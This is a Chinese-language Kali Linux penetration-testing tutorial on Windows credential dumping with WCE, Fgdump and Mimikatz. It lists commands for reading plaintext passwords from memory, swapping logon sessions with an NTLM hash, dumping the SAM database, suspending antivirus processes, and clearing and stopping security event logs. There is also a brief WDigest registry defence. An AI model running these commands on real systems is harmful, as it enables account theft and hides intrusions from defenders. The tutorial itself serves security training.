Kali Linux渗透测试之提权(二)——WCE、Fgdump、Mimikatz
1. Windows身份认证的过程
- 在登录目标系统时,会将输入的密码进行lmhash和nthash加密;
- 然后将加密后的密码与SAM账户数据库进行比对,如果比对匹配,则成功登录操作系统;
- 如果是远端的主机尝试进行登录目标系统,也是通过远端主机自身将输入的密码进行lmhash和nthash计算,将加密后的密文通过网络进行传输到目标主机;
- 所以,不论是本地还是远端登录操作系统,密码都是以密文的形式进行传输,相对安全,当然也可以用hash碰撞的方式进行爆破;
注:在登陆的目标服务系统后,有一个wdigest安全包,直接从内存总读取账户信息,会在本地缓存一个明文密码,当注销登陆后,该账户信息会被删除;
2. WCE(Windows credential editor)——Windows身份验证信息编辑器
WCE是一款功能强大的windows平台内网渗透的工具,使用WCE必须要有管理员的权限;
它集成在kali的工具包的windows程序中,可以共享给win_XP;
它可以列举登陆会话,并且可以添加、改变和删除相关凭据。在内网渗透中非常强大;主要功能参数如下:
查看当前系统中的账户信息;
(1) wce-universal.exe -l
# 查看当前登录的账户和加密的密码,其中,计算机名也会被当做用户来处理;
(2)wce-universal.exe -lv
# 查看登录状态用户的详细信息,包括LUID,账户和加密后的密码等;
# 查看信息时,首先尝试安全模式,直接从内存中读取信息,读取失败后,会尝试注入模式(可能对系统造成损害)
(3) wce-universal.exe -d LUID
wce-universal.exe -d 00408339,# 删除一个指定会话的LUID,删除y用户的LUID,可以看到y用户的当前会话没有了;
(4) wce-universal.exe -r
# 显示当前最新登录信息,5秒刷新一次;在此过程中,尝试登录z账户,可以看到已经刷新出z账户的会话信息;
(5) wce-universal.exe -g 123456
# 对指定的内容进行hash计算;
(6) wce-universal.exe -w
# 以明文形式读取密码,最常用和实际的作用;
(7) 修改用户的登录会话,将z用户的登录会话修改成另外的一个用户yaoxingzhi;
wce-universal.exe -i 00523687 -s yaoxingzhi:UPWARD:
AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
(8)防御WCE攻击
系统通过Digest Authentication Package维护明文密码,默认自启动,可在注册表(regedit)中关闭默认启动。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Package
可以看到在注册表中关闭维护明文密码之后,再次运行wce-universal.exe -w,不能获取任何的信息,并且系统会自动重启;
3. Fgdump工具
Fgdump是集成在Kali上的Windows工具;可以下载到win_XP上使用;
双击fgdump,可以得到如下三个文件,其中一个包括账户和加密的密码文件;
获取到加密的密码后,可以通过Kali集成的工具进行hash碰撞;
4. mimikatz工具
Mimikatz(usr/share/mimikatz)是在Kali上集成的Windows工具;
Mimikatz工具是由俄罗斯人写的,用法跟其他的工具不太一样;
常见的功能如下所示:
(1) :: #查看帮助信息;
(2)privilege::debug #提升权限;
(3)sekurlsa::logonPasswords #查看登录状态的账户和密码;
登录切换另外的账户;可以查看所有登录账户的用户名和密码;
(4)process模块
4.1> 查看可以执行的子模块;
4.2> 查看进程列表;
4.3> 开启一个进程;
4.4> suspend #挂起进程:可用于植入木马时,暂停防病毒软件等;
(5)lsadump模块 # lsadump::sam从SAM数据库中读取账号密码,在XP中不成功,但在WIN7、win8中可能成功;
(6)event模块
6.1> event::clear # 清除操作系统的安全日志
6.2> event::drop #不再进行新的日志
(7) misc模块
misc::cmd #打开cmd命令行窗口;
(8)token模块
token::whoami
